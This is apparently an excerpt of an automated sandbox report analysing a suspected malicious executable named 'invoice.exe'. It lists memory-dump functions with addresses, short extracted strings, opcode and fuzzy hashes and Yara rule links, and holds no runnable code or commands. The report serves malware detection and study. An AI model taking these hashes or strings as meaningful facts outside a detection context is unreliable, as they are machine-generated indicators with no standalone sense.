Instruction Fuzzy Hash: 7861E3B4E1660ACFCB04CFA9C9808DEFBF6FF89210F24942AD615B7314D7749A418B65

Function 057DE2D8 Relevance: 1.4, Strings: 1, Instructions: 143COMMON

Download Yara Rule

Strings

V3~, xrefs: 057DE37E

Memory Dump Source

Source File: 00000000.00000002.1713422518.00000000057D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_57d0000_invoice.jbxd

Similarity

API ID:
String ID: V3~
API String ID: 0-1917302123
Opcode ID: 041bc7171a56e1c2a24ef13fb7ff7462d7e61553bbd01ae1c5200c349f4a2327
Instruction ID: 5bc181b9239d467b0b1d4454a0d846b2a90c7e0cfc859a7408dc5abab704bd5c
Opcode Fuzzy Hash: 041bc7171a56e1c2a24ef13fb7ff7462d7e61553bbd01ae1c5200c349f4a2327
Instruction Fuzzy Hash: 1E513870E05219CFDB08CFAAD5405AEFBF6FF88300F14D52AE819BB254D73499419B64

Function 057DE2CB Relevance: 1.4, Strings: 1, Instructions: 140COMMON

Download Yara Rule

Strings

V3~, xrefs: 057DE37E

Memory Dump Source

Source File: 00000000.00000002.1713422518.00000000057D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_57d0000_invoice.jbxd

Similarity

API ID:
String ID: V3~
API String ID: 0-1917302123
Opcode ID: 19113e43a1dd0095f8829781795738e7e564c416196499ad27d5981334e34c56
Instruction ID: 7940f59d84e8f2420ba622bbb18649fd54ee8cce823a153b74786ccd9ae3f3bd
Opcode Fuzzy Hash: 19113e43a1dd0095f8829781795738e7e564c416196499ad27d5981334e34c56
Instruction Fuzzy Hash: 9D515B70E05219CFDB08CFAAC5406AEFBF3FF88300F24D16AE819AB254D73499419B64

Function 07EFB613 Relevance: 1.4, Strings: 1, Instructions: 132COMMON

Download Yara Rule

Strings

?8, xrefs: 07EFB67B

Memory Dump Source

Source File: 00000000.00000002.1715988344.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ef0000_invoice.jbxd

Similarity

API ID:
String ID: ?8
API String ID: 0-3288465736
Opcode ID: 970bd9138076a5b96ec01871d7a8c233c1b5c4520d6a9333c90b8d5f618d151d
Instruction ID: 4270424e0fb84075508b1473d62c66c19d00ded998743d40b97448353dabef45
Opcode Fuzzy Hash: 970bd9138076a5b96ec01871d7a8c233c1b5c4520d6a9333c90b8d5f618d151d
Instruction Fuzzy Hash: 7E512AB5E012198FCB14CFA9D5805AEFBF2AF89304F24D16AD418AB356D7315E42CF60

Function 07EF21D8 Relevance: 1.4, Strings: 1, Instructions: 107COMMON

Download Yara Rule

Strings

4$VD, xrefs: 07EF222F

Memory Dump Source

Source File: 00000000.00000002.1715988344.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ef0000_invoice.jbxd

Similarity

API ID:
String ID: 4$VD
API String ID: 0-4229505421
Opcode ID: 89f1c6f03e51cedb3fc02e16d6b4b6671a85bb0b5da007a737ef405cad324bc6
Instruction ID: cb0e5fe3e9eea4a5bcf0452f9d01fac5f1b4aa5c7e021f0c7831b6317b60ab3b
Opcode Fuzzy Hash: 89f1c6f03e51cedb3fc02e16d6b4b6671a85bb0b5da007a737ef405cad324bc6
Instruction Fuzzy Hash: 344109B0E1260A8BDB44CFAAD9815EEFBF6BF88300F14D42AC615B7254D7349A41CF95

Function 07EF21CB Relevance: 1.4, Strings: 1, Instructions: 106COMMON

Download Yara Rule

Strings

4$VD, xrefs: 07EF222F

Memory Dump Source

Source File: 00000000.00000002.1715988344.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ef0000_invoice.jbxd

Similarity

API ID:
String ID: 4$VD
API String ID: 0-4229505421
Opcode ID: ffb35b4faa15770c97aab6d41b5ed6f9d3c5df2f722a8d58b50c68ffccc5b5ff
Instruction ID: eae30b07850aaf5d7d0bf065b58553b8f7bf29ebeae671d06a3911ee83f0dba3
Opcode Fuzzy Hash: ffb35b4faa15770c97aab6d41b5ed6f9d3c5df2f722a8d58b50c68ffccc5b5ff
Instruction Fuzzy Hash: E14119B0E1260A8FDB04CFAAD8415EEFBF6BF88300F14D02AD615A7254D7349642CF95

Function 07EF44A8 Relevance: .3, Instructions: 313COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1715988344.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ef0000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1c145416d87bab5fd2c5e84b04125705720578bff3503cacc9352027d0225da
Instruction ID: 87f22441900a53fe27ffbbe7a9701fa08549385554615b9daf8830c5ecb7e356
Opcode Fuzzy Hash: d1c145416d87bab5fd2c5e84b04125705720578bff3503cacc9352027d0225da
Instruction Fuzzy Hash: B3D117B0E15259DFDB08CFAAD58059EFBF2BF8A300F14E52AD415AB264D73499428F14

Function 07EFD258 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1715988344.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ef0000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9b2d065bec1baf77487f9a117d7aa76c862dcfd7f43d69ae8e9712fa081d1b4
Instruction ID: 7cfc166840cfb6c721459a60fe2932b8638ba9c0a5a3646f13134741e428fb0c
Opcode Fuzzy Hash: a9b2d065bec1baf77487f9a117d7aa76c862dcfd7f43d69ae8e9712fa081d1b4
Instruction Fuzzy Hash: 3DE108B4E01119CFCB14DFA9D9909AEBBB2FF89304F249169D508AB356DB30AD41CF60

Function 07EFB1E8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1715988344.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ef0000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20fe466f14b279811babb83580935c93a35d659a9b13cc57c25e60deb64aae7e
Instruction ID: e906f078b767b95c8c792627fcadd4f7dd62dd4e16985208f8a1156d0de7a343
Opcode Fuzzy Hash: 20fe466f14b279811babb83580935c93a35d659a9b13cc57c25e60deb64aae7e
Instruction Fuzzy Hash: 8EE1F6B4E011198FCB14DFA9D5809AEFBB2FF89304F249169E514AB35ADB34AD41CF60

Function 07EFCE20 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1715988344.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ef0000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93e143e1546880196d5021471052f71fffecffc49117c98529d5ffd8a2d9c299
Instruction ID: 331f0439feadca6243d9aec1229f83f79cc9a824dc685896e10e45f8fd97dfe2
Opcode Fuzzy Hash: 93e143e1546880196d5021471052f71fffecffc49117c98529d5ffd8a2d9c299
Instruction Fuzzy Hash: BAE109B4E011198FCB14DFA9D5909AEFBB2FF89304F249169E514AB356DB30AD42CF60

Function 07EFADB0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1715988344.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ef0000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41dcb84d7e838cad52b0318157b3065d1b8de5d307fb2520af9d65730885faaa
Instruction ID: af5c709480980f02014f5e643101c6e4de9ff6fb5159d603b7414a5054c8835c
Opcode Fuzzy Hash: 41dcb84d7e838cad52b0318157b3065d1b8de5d307fb2520af9d65730885faaa
Instruction Fuzzy Hash: 27E1E8B4E111198FCB14DFA9D5809AEFBB2FF89304F249169E518AB356DB30AD41CF60

Function 07EF4498 Relevance: .3, Instructions: 311COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1715988344.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ef0000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b704d16898a096fb597fcfad60d8771c3f19cdecae8579669ea9c354471a395
Instruction ID: b9a07cba2b687df69c07850ece47d7e6339c3fb40ef2da647c26389aded1e395
Opcode Fuzzy Hash: 6b704d16898a096fb597fcfad60d8771c3f19cdecae8579669ea9c354471a395
Instruction Fuzzy Hash: 9CD116B0E15259DFDB08CFAAD98059EFBF2BF8A300F14E52AD415AB264D7349942CF14

Function 07EF1AA8 Relevance: .3, Instructions: 267COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1715988344.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ef0000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f3fd9858460bc61d5e6ed96373598ab6a5ae1e261b28efcff90abaa63cfa296
Instruction ID: b825a4872a728b31097c706e3395122410e9da9cf2dc388260a084d5248eef51
Opcode Fuzzy Hash: 4f3fd9858460bc61d5e6ed96373598ab6a5ae1e261b28efcff90abaa63cfa296
Instruction Fuzzy Hash: 76B105B4E1621ECFCB04CF98D5819EEFBB2FB89310F149566D504A7704E7309A41CB95

Function 057DBBAB Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713422518.00000000057D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_57d0000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb26e60b830c62607ab7fd3043b8ed843c88fae038c8b9af728277e887d55108
Instruction ID: 25fd66d8c9679756efd2030a89e5224551a47c279d167f3e5a2dbec57015a38f
Opcode Fuzzy Hash: eb26e60b830c62607ab7fd3043b8ed843c88fae038c8b9af728277e887d55108
Instruction Fuzzy Hash: 4FD1D73592075A8ACB10EB68D994AADB7B5FFA5300F10C79AE04937211EF706EC5CF91

Function 016FE42C Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1710592193.00000000016F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78174857fba7eac557a6eb3e22413b6aaafb01fc310ce2e172ee392e85e0e06d
Instruction ID: 7334dff81a25f435178a54e8c40006aa2012614b0361f32e3aa4fcaabc4ba15f
Opcode Fuzzy Hash: 78174857fba7eac557a6eb3e22413b6aaafb01fc310ce2e172ee392e85e0e06d
Instruction Fuzzy Hash: ABA16F32E002198FCF15DFB8C84459EBBB2FF89300B1585AEEA05AB265DB75D955CB80

Function 057DBBB0 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713422518.00000000057D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_57d0000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f69302c31d15f469072c581070d93a81bb5a4c622b3d944dcf6e45c40ecf5364
Instruction ID: 6e9ef875fdb537264f110dbc5fd1581e0493f94b562af70faad33a9c0a7847fa
Opcode Fuzzy Hash: f69302c31d15f469072c581070d93a81bb5a4c622b3d944dcf6e45c40ecf5364
Instruction Fuzzy Hash: E3D1D73592075A8ACB10EB68D994AADB7B5FFA5300F10C79AE04937211EF706EC5CF91

Function 07EF2F68 Relevance: .3, Instructions: 252COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1715988344.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ef0000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 842d8e603a5e4c569ad80e4031f0c6cfcab40291f0149a08da9a958a37693a08
Instruction ID: 2483fcbcc352a6d1185cae9a4d47bf804e2ba0457c559816cea29b478a23bd95
Opcode Fuzzy Hash: 842d8e603a5e4c569ad80e4031f0c6cfcab40291f0149a08da9a958a37693a08
Instruction Fuzzy Hash: 99B129B0E152198BCB14DFA9D9809AEFBB2FF89304F24D169E509A7355D730AD41CF60

Function 07EF2F5B Relevance: .2, Instructions: 242COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1715988344.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ef0000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d517c41a37a4f8c3755df85dea475ddfd2ad7adaf5b7d27b1d803c614fa7e14
Instruction ID: 527bddcb16271cf2184e8b741176b3354081fd71770b2befcb24a8f9c5b6a1ed
Opcode Fuzzy Hash: 2d517c41a37a4f8c3755df85dea475ddfd2ad7adaf5b7d27b1d803c614fa7e14
Instruction Fuzzy Hash: 5DB13AB0E152198BCB14DFA9D9809AEFBF2BF89304F24D169E509A7355D7309D41CF60

Function 07EF3013 Relevance: .2, Instructions: 211COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1715988344.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ef0000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5506cfb527bc57d76d52e1f3f77afceade3522efdad66d2c3ff4e76d020a34d3
Instruction ID: 8336e7cb8e72bd5fe3c1f874a838e8cb6c986be901ea9a38e20d26f649c4d314
Opcode Fuzzy Hash: 5506cfb527bc57d76d52e1f3f77afceade3522efdad66d2c3ff4e76d020a34d3
Instruction Fuzzy Hash: 36A128B4E152198FCB10DFA9D98099EFBB2FB89304F24A199E509A7355D730AD81CF60

Function 07EF1B28 Relevance: .2, Instructions: 190COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1715988344.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ef0000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c1d74e000e4ac816cf1e18f3b8d9c8739f2ebb15527c2b0ca183f8d41e33865
Instruction ID: f0c35381b2799dc48636db37b9de7a7041118ac8b04818d4f04cd21c77fdae46
Opcode Fuzzy Hash: 8c1d74e000e4ac816cf1e18f3b8d9c8739f2ebb15527c2b0ca183f8d41e33865
Instruction Fuzzy Hash: 2581E3B4E1221ECFCB04CF99C5819EEBBB2FB89340F14956AD505A7714E730AE41CBA5

Function 07EF0F68 Relevance: .2, Instructions: 178COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1715988344.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ef0000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df3ec32d2428a821988d701a8d23bc848fa2c5ab95001061dfa7add2660e06c3
Instruction ID: e4a74ae5188d3a4450a8fea87afd6961678f5ad2c0baddc5b0f024c3a3def9ac
Opcode Fuzzy Hash: df3ec32d2428a821988d701a8d23bc848fa2c5ab95001061dfa7add2660e06c3
Instruction Fuzzy Hash: 8981E0B4E11209CFCB44CF99C58499EFBF1FF89210F249559E515AB721D730AA52CF90

Function 07EF0D58 Relevance: .2, Instructions: 178COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1715988344.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ef0000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e0ec07809b7f5fec25ac875c031d52d8939a75d655a1805b61d822e68c7593c
Instruction ID: 377b22bcc3c95eff9f162b842882b8c2bda3e6775f7d14ecb4cb96ea26e50a8a
Opcode Fuzzy Hash: 3e0ec07809b7f5fec25ac875c031d52d8939a75d655a1805b61d822e68c7593c
Instruction Fuzzy Hash: 61616DB0E1610ADFCB48CF99C5809AEFBB2FF89300F14E56AC615A7606D730AA418F55

Function 07EF0F63 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1715988344.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ef0000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d62112f161707397f7404b87b8f9cc897e8b3a5be184286359719b2ea1a4ae69
Instruction ID: fcc59be7da6a3e9a2626506bedb2f9c03782ae26fc2fac6505d67835af6f4790
Opcode Fuzzy Hash: d62112f161707397f7404b87b8f9cc897e8b3a5be184286359719b2ea1a4ae69
Instruction Fuzzy Hash: D871EEB4E1220ACFCB44CFA9C58499EFBF1FF88210F249565E415AB725D730AA52CF90

Function 07EF1B38 Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1715988344.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ef0000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65cf57a365376636681abe4b635ed7a63afb89f0680f68eaa198d238f0d18f48
Instruction ID: 8ea4c2e6e245e69ad8b86b1644296b5748b7b4d4c5c3cafc73da9c548da7c9c9
Opcode Fuzzy Hash: 65cf57a365376636681abe4b635ed7a63afb89f0680f68eaa198d238f0d18f48
Instruction Fuzzy Hash: 6C61E2B4E1621DCFCB04CFA9D5819EEFBB2FB49300F14A55AD505AB714E730A942CBA4

Function 07EF25D8 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1715988344.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ef0000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5e7093a8147ba7f514753fe05b6247e8ecae15aeca12e157ca382f1f2764c97
Instruction ID: dd4cc3d88d40f12e89e396acfade1a0adf76b87427fbe62d6f060d43d339fd12
Opcode Fuzzy Hash: c5e7093a8147ba7f514753fe05b6247e8ecae15aeca12e157ca382f1f2764c97
Instruction Fuzzy Hash: C7512BB4E1620ADBCB04CFA6C5804EEFBF6BF89300F25E46AC605B7654D7349A418F95

Function 07EF0D68 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1715988344.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ef0000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a10b16d8af3b16412b75a38237509d6d69eac3b26ab8fb492f436d3d0ca00630
Instruction ID: 3eaf3dc703071b20620c955ed193788c25d49a52b09c08901f0fc67a877768de
Opcode Fuzzy Hash: a10b16d8af3b16412b75a38237509d6d69eac3b26ab8fb492f436d3d0ca00630
Instruction Fuzzy Hash: 54414EB0E16109DFCB48CF99C5809AEFBB2FF85300F10E59AC115A7606D730EA518F55

Function 057DCB68 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713422518.00000000057D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_57d0000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2dfa3787bc825d4b2775772af7fe33eb92a05294ee5ffa9541a6f9ed41adf8ac
Instruction ID: 8f41a1a48015a31b32610516115aeb4cc2e2c8e99fe9362b502634dd961b3d12
Opcode Fuzzy Hash: 2dfa3787bc825d4b2775772af7fe33eb92a05294ee5ffa9541a6f9ed41adf8ac
Instruction Fuzzy Hash: 7A312BB1E016189BDB58CFABD84069EFBF7AFC8210F14C176D408A7214DB305981CF65

Function 057DCB59 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713422518.00000000057D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_57d0000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6038033489335ae698a517b88d4b835c2bd48eae6ae8ce919214dfe9055b6e96
Instruction ID: d2d7db641dd14201bf0088c93da6475cf39e6d2fa1aad51c0f3a587424a4340e
Opcode Fuzzy Hash: 6038033489335ae698a517b88d4b835c2bd48eae6ae8ce919214dfe9055b6e96
Instruction Fuzzy Hash: BB312B71E016189BDB58CFABD84069EFFF7AFC8200F14C56AD408A7214DB305985CF61

Analysis Process: invoice.exePID: 7644, Parent PID: 7496COMMON

Executed Functions

Function 02F97118 Relevance: 5.4, Strings: 4, Instructions: 350COMMON

Download Yara Rule

Strings

,bq, xrefs: 02F9728A
(o^q, xrefs: 02F97212
,bq, xrefs: 02F97298
(o^q, xrefs: 02F97220

Memory Dump Source

Source File: 00000002.00000002.4135414754.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f90000_invoice.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$,bq$,bq
API String ID: 0-879173519
Opcode ID: a7fead4a530c8888135492ab1bff45a1975d27844f7a188468dcfa7af1fce3ed
Instruction ID: 3b41f53c21d501ad3250eda3a781771b71626dc5fbdcbbd5ee30ecd6b47f1845
Opcode Fuzzy Hash: a7fead4a530c8888135492ab1bff45a1975d27844f7a188468dcfa7af1fce3ed
Instruction Fuzzy Hash: DDE119B1E20209CFEF15DFA9C984AADFBB2BF49384F158065E915AB265D730E841CF50

Function 02F9A088 Relevance: 3.4, Strings: 2, Instructions: 898COMMON

Download Yara Rule

Strings

(o^q, xrefs: 02F9A518
4'^q, xrefs: 02F9AB13

Memory Dump Source

Source File: 00000002.00000002.4135414754.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f90000_invoice.jbxd

Similarity

API ID:
String ID: (o^q$4'^q
API String ID: 0-273632683
Opcode ID: bf868c3cdbf47913631a42ddd1836f3ef95cf31226130b582747497811fe9e2e
Instruction ID: 9c03abde0a8c7cf60cfc77832d58dd212ef6e32bca6c5946e5207643ebc407d9
Opcode Fuzzy Hash: bf868c3cdbf47913631a42ddd1836f3ef95cf31226130b582747497811fe9e2e
Instruction Fuzzy Hash: 3B826931A00209DFDF15CFA8C984AAEBBF2FF88394F158559EA059B265D731E981CB50

Function 02F969A0 Relevance: 3.0, Strings: 2, Instructions: 517COMMON

Download Yara Rule

Strings

(o^q, xrefs: 02F96EDA
Hbq, xrefs: 02F96DA6

Memory Dump Source

Source File: 00000002.00000002.4135414754.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f90000_invoice.jbxd

Similarity

API ID:
String ID: (o^q$Hbq
API String ID: 0-662517225
Opcode ID: 040eb468a53bbde13bbae7cf64e83ea33ad000442022e214cf3a0c2ab2411c2b
Instruction ID: d56ce45d27193406b570346a8c0f2da734bb0542ec7e51338f159d9671b26a35
Opcode Fuzzy Hash: 040eb468a53bbde13bbae7cf64e83ea33ad000442022e214cf3a0c2ab2411c2b
Instruction Fuzzy Hash: 5F126C70A002198FDB19DF69C854AAEBBFABF88344F108569E516DB390EF349D41CB90

Function 02F93E09 Relevance: 2.9, Strings: 2, Instructions: 434COMMON

Download Yara Rule

Strings

$^q, xrefs: 02F93E2E
Xbq, xrefs: 02F93E47

Memory Dump Source

Source File: 00000002.00000002.4135414754.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f90000_invoice.jbxd

Similarity

API ID:
String ID: Xbq$$^q
API String ID: 0-1593437937
Opcode ID: 52b89dc7103b3f0b99b987fe28c7220fd9b913d6140cbba48b95b6330038883b
Instruction ID: b1c4f73d8e989f6fb2c1a817f963699618a61d3e5043cf548b883ebfa85df228
Opcode Fuzzy Hash: 52b89dc7103b3f0b99b987fe28c7220fd9b913d6140cbba48b95b6330038883b
Instruction Fuzzy Hash: C2F17B75F04218CFEB08DFB9D8546AEBBB2FF89740B148569D506AB354CF359802CB91

Function 02F9C46C Relevance: 2.7, Strings: 2, Instructions: 201COMMON

Download Yara Rule

Strings

PH^q, xrefs: 02F9C6D0
PH^q, xrefs: 02F9C6BF

Memory Dump Source

Source File: 00000002.00000002.4135414754.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f90000_invoice.jbxd

Similarity

API ID:
String ID: PH^q$PH^q
API String ID: 0-1598597984
Opcode ID: b753384b8753ca3ba01908e2cb2a54ccf903695c714c907747c952c50cad57a9
Instruction ID: 12f5081c108e9117bc8de92f485277c935b5194c5557cc56ffd3113029672b58
Opcode Fuzzy Hash: b753384b8753ca3ba01908e2cb2a54ccf903695c714c907747c952c50cad57a9
Instruction Fuzzy Hash: 2391C674E00218CFEB14DFAAD984A9DBBF2FF89340F14906AE519AB365DB315981CF50

Function 02F95362 Relevance: 2.7, Strings: 2, Instructions: 197COMMON

Download Yara Rule

Strings

PH^q, xrefs: 02F955D9
PH^q, xrefs: 02F955C8

Memory Dump Source

Source File: 00000002.00000002.4135414754.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f90000_invoice.jbxd

Similarity

API ID:
String ID: PH^q$PH^q
API String ID: 0-1598597984
Opcode ID: ed7cd9f7e327832c854485db0318e9f78c1472f3df7875ae4764a3fb718f4df6
Instruction ID: bfc04fc986e7aa45c2fc3946a6fa84b2d3d0e6b0b75112c1df574dc0b694af05
Opcode Fuzzy Hash: ed7cd9f7e327832c854485db0318e9f78c1472f3df7875ae4764a3fb718f4df6
Instruction Fuzzy Hash: B591D774E00218CFEB15CFAAD994A9DBBF2BF89340F14C069D909AB365DB349945CF50

Function 02F9D278 Relevance: 2.7, Strings: 2, Instructions: 189COMMON

Download Yara Rule

Strings

PH^q, xrefs: 02F9D4CF
PH^q, xrefs: 02F9D4E0

Memory Dump Source

Source File: 00000002.00000002.4135414754.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f90000_invoice.jbxd

Similarity

API ID:
String ID: PH^q$PH^q
API String ID: 0-1598597984
Opcode ID: 14969a947a6b910cf419c0b1ddf5864d09724888f31a8149de2c33e52e8e39ec
Instruction ID: cb7fe23ba5aaf1aa346b13b1f8dff6545e75b71d2c9cc4dee0c3ce40b40e9c29
Opcode Fuzzy Hash: 14969a947a6b910cf419c0b1ddf5864d09724888f31a8149de2c33e52e8e39ec
Instruction Fuzzy Hash: 1881C874E00218CFEB18DFAAD944A9DBBF2BF89340F24C069D509AB365DB309945CF50

Function 02F9CCD8 Relevance: 2.7, Strings: 2, Instructions: 189COMMON

Download Yara Rule

Strings

PH^q, xrefs: 02F9CF2F
PH^q, xrefs: 02F9CF40

Memory Dump Source

Source File: 00000002.00000002.4135414754.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f90000_invoice.jbxd

Similarity

API ID:
String ID: PH^q$PH^q
API String ID: 0-1598597984
Opcode ID: 327a301e2c06450e8f8a64b2e0f947ecd65e114ed7c6467a56820d0c94d890c8
Instruction ID: c6af8b0f66181dc8d905d6bdb90518c3d7d7dc7fb68cb9dc370058dd2b94aa02
Opcode Fuzzy Hash: 327a301e2c06450e8f8a64b2e0f947ecd65e114ed7c6467a56820d0c94d890c8
Instruction Fuzzy Hash: FF81C674E00258CFEB14DFAAD984A9DBBF2BF89340F14C06AD519AB365DB305985CF50

Function 02F9CA08 Relevance: 2.7, Strings: 2, Instructions: 188COMMON

Download Yara Rule

Strings

